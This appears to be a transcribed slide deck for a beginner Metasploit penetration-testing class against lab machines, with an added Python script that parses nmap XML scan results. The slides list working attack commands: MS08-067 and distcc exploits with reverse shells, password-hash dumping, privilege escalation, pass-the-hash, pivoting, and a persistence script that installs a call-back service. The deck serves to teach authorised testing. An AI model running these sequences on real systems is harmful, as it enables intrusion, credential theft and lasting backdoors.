Metasploit for Penetration Testing: Beginner Class



Metasploit For Beginners
  1. Penetration Testing with Metasploit
     Georgia Weidman
  2. Acknowledgements
     • Metasploit Team
     • Offensive Security/Metasploit Unleashed
     • Hackers for Charity
     • David Kennedy
     • BSides Delaware Crew
     • Darren
  3. Agenda
     • Metasploit Basics
       – Some terminology/brief intro to pentesting
       – How Metasploit works
       – Interacting with Metasploit
     • Basic Exploitation
       – Exploiting a vulnerability using the Metasploit console
     • Using Meterpreter
       – Using the Meterpreter shell for post exploitation
  4. Agenda
     • Metasploit in a penetration test
       – Information Gathering
       – Vulnerability Scanning
       – Exploitation in depth
       – Post exploitation
       – Reporting
     • Hack some stuff
       – Pop my boxes
  5. Connecting
     Wireless access point SSID: IgnatiusRiley
     Password: metasploit
  6. What's in the lab?
     • Windows XP SP2
       – IP address:
     • Ubuntu Linux 8.04 (Metasploitable)
       – IP address:
     Others below .100 (.100 and above are you guys)
  7. What is Penetration Testing?
     Simulation of a real attack
     Get out of jail free card for exploiting systems
     Report to customers with findings and recommendations
     Find and remediate vulnerabilities before attackers exploit them
  8. What is Metasploit?
     Exploitation framework
     Ruby based
     Modular: exploits, payloads, auxiliaries, and more
  9. Metasploit Terminology
     Exploit: vector for penetrating the system
     Payload: shellcode, what you want the exploit to do
     Encoders: encode or mangle the payload
     Auxiliary: other modules besides exploitation
     Session: connection from a successful exploit
  10. Metasploit Interfaces
     Msfconsole
     Msfcli
     Msfweb, Msfgui (discontinued)
     Metasploit Pro, Metasploit Express
     Armitage
  11. Exploitation Streamlining
     • Traditional Pentest:
       – Find public exploit
       – Change offsets and return address for your target
       – Replace shellcode
     • Metasploit:
       – Load Metasploit module
       – Select target OS
       – Set IP addresses
       – Select payload
  12. Using Msfconsole: Exploitation
     use <module> - sets the exploit/auxiliary/etc. to use
     set <x X> - sets a parameter
     setg <x X> - sets a parameter globally
     show <x> - lists all available x
     exploit - runs the selected module
  13. Windows Exploitation Example
     search windows/smb
     info windows/smb/ms08_067_netapi
     use windows/smb/ms08_067_netapi
     show payloads
     set payload windows/meterpreter/reverse_tcp
     show options
     set lhost (set other options as well)
     exploit
  14. MSFcli Exploitation Example
     ./msfcli <exploit> <option=x> E
     Example: msfcli windows/smb/ms08_067_netapi RHOST= LHOST= PAYLOAD=windows/shell/bind_tcp E
     E = exploit
     O = show options
     P = show payloads
  15. Linux Exploitation Example
     search distcc
     use unix/misc/distcc_exec
     show payloads
     set payload cmd/unix/reverse
     show options
     set rhost
     set lhost (your ip)
     exploit
  16. Sessions
     sessions -l - lists all active sessions
     sessions -i <id> - interact with a given session
  17. Meterpreter
     Gain a session using a meterpreter payload
     Memory based/never hits the disk
     Everything a shell can do plus extra
  18. Meterpreter Commands
     help - shows all available commands
     background - backgrounds the session
     ps - shows all processes
     migrate <process id> - moves meterpreter to another process
     getuid - shows the user
  19. Meterpreter Commands
     download <file> - pulls a file from the victim
     upload <file on attacker> <file on victim> - pushes a file to the victim
     hashdump - dumps the hashes from the SAM
     shell - drops you in a shell
  20. Exercise
     In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  21. Information Gathering
     Learning as much about a target as possible
     Examples: open ports, running services, installed software
     Identify points for further exploration
  22. Metasploit and Databases
     Metasploit supports MySQL and PostgreSQL
     /etc/init.d/postgresql-8.4 start (starts PostgreSQL)
     msf > db_connect postgres:password@ (connects to the database server and creates the database metasploit)
  23. Portscanning
     Queries a host to see if a program is listening
     Ex: Browsing to a website - the webserver listens on port 80
     Listening ports are accessible by an attacker and, if vulnerable, may be used for exploitation
     Ex: ms08_067_netapi exploits SMB on port 445
  24. Metasploit and nmap
     Port scanning and just about everything else
     man nmap
     Ex: nmap -sV -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)
     msf > db_import subnet1.xml
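Slide 24 feeds subnet1.xml to db_import. As an added example (not from the original deck and not Metasploit's own importer), this Python script parses a constructed nmap -sV XML file into the same host and service records db_import populates, so the services exposed on a subnet can be reviewed against what should be listening; the sample XML, its addresses and the function names are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
# Constructed sample of what "nmap -sV -oA subnet1" writes to subnet1.xml; the
# hosts, ports and banners are made up for illustration and are not lab data.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host><status state="up"/><address addr="192.168.20.10" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="135"><state state="closed"/><service name="msrpc"/></port>
  <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/></port>
  <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
 </ports></host>
 <host><status state="up"/><address addr="192.168.20.11" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
  <port protocol="tcp" portid="3632"><state state="open"/><service name="distccd" product="distccd" version="v1"/></port>
 </ports></host>
 <host><status state="down"/><address addr="192.168.20.12" addrtype="ipv4"/></host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """One record per scanned port: the host and service rows db_import loads."""
    records = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue  # nmap still lists hosts that never answered; skip them like db_import does
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.findall("ports/port"):
            svc = port.find("service")
            banner = [svc.get("product"), svc.get("version")] if svc is not None else []
            records.append({
                "host": addr.get("addr"),
                "port": int(port.get("portid")), "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": svc.get("name", "") if svc is not None else "",
                "info": " ".join(p for p in banner if p),  # -sV product/version banner
            })
    return records

def open_services(records):
    """The 'services' view from slide 31: only ports that answered as open."""
    return [r for r in records if r["state"] == "open"]

def hosts_listening_on(records, port, proto="tcp"):
    """Hosts exposing one port, e.g. 445 to see where SMB is reachable at all."""
    return sorted({r["host"] for r in open_services(records)
                   if r["port"] == port and r["proto"] == proto})
```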
  25. MSF Auxiliary Portscanners
     msf > search portscan (shows portscan modules)
     scanner/portscan/tcp (runs a TCP syn scan)
     Use auxiliary modules like exploits (use, set, exploit, etc.)
  26. Some Other MSF Scanners
     scanner/smb/smb_version (scans port 445 for the SMB version, good way to get the OS version)
     scanner/ssh/ssh_version (queries the SSH version)
     scanner/ftp/anonymous (anonymous FTP login)
  27. Vulnerability Scanning
     Query systems for potential vulnerabilities
     Identify potential methods of penetration
     Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, so scan for the ms08_067_netapi vulnerability
  28. Metasploit and Nessus
     Tenable's Vulnerability Scanner (
     msf > load nessus
     msf > nessus_connect student1:password@ ok (ok says no SSL is ok)
     msf > nessus_policy_list
     msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
     msf > nessus_report_list
     msf > nessus_report_get <report id>
  29. Metasploit Vulnerability Scanners
     SMB Login: given a set of credentials, what systems can they access?
     scanner/smb/smb_login
     Open VNC and X11: if misconfigured, may be accessible without credentials
     scanner/vnc/vnc_none_auth
     scanner/x11/open_x11
  31. Our Database
     hosts
     services
     vulns
     -c select columns
     -s search for a specific string
  32. db_autopwn
     By default just runs all the exploits that match a given open port
     Not stealthy
     Using vulnerability data it can be made smarter: matches vulnerabilities instead of ports
     db_autopwn -x -e
  33. Attacking MSSQL
     MSSQL TCP port can change, UDP port is 1434
     msf > search mssql (shows all mssql modules)
     msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)
     msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)
     msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
  34. We have a shell, now what?
     Privilege escalation
     Local information gathering
     Exploiting additional hosts
     Maintaining access
     Forensic avoidance
  35. Meterpreter: Privilege Escalation
     A session has the privileges of the exploited process
     getuid (tells you what user your session is running as)
     getsystem (tries various techniques to escalate privileges)
  36. Meterpreter: Enabling Remote Desktop
     Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
     run getgui -e
  37. Meterpreter: Migrating
     If the process that hosts meterpreter closes, meterpreter dies too
     Example: client side exploit residing in the browser
     meterpreter > ps (shows all processes)
     meterpreter > migrate <process id> (moves to a new process)
  38. Meterpreter: Searching for Content
     Look for specific interesting files on the exploited system
     search -h
     Example: search -f *.jpg (finds all the porn)
  39. Pivoting
     Scenario: exploit a dual networked host, with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
     route add 1 (routes traffic to the subnet through session 1)
     Now you can portscan, exploit, etc. the non-routable subnet
  40. PSExec
     hashdump (dumps the hashes, not always easy to crack)
     Why not just pass the hash to other systems?
     use windows/smb/psexec
     set SMBPass to the hash
  41. Meterpreter: Persistence
     Persistence script installs a meterpreter service
     Meterpreter comes back when the box restarts
     Ex: run persistence -U -i 5 -p 443 -r (respawns on login, at a 5 second interval, on port 443 to ip
  42. Exercises
     Perform a penetration test on the Windows and Linux systems we used in class
     Perform a penetration test on the lab network
  43. Contact
     Georgia Weidman
     Website:
     Email:
     Twitter: @vincentkadmon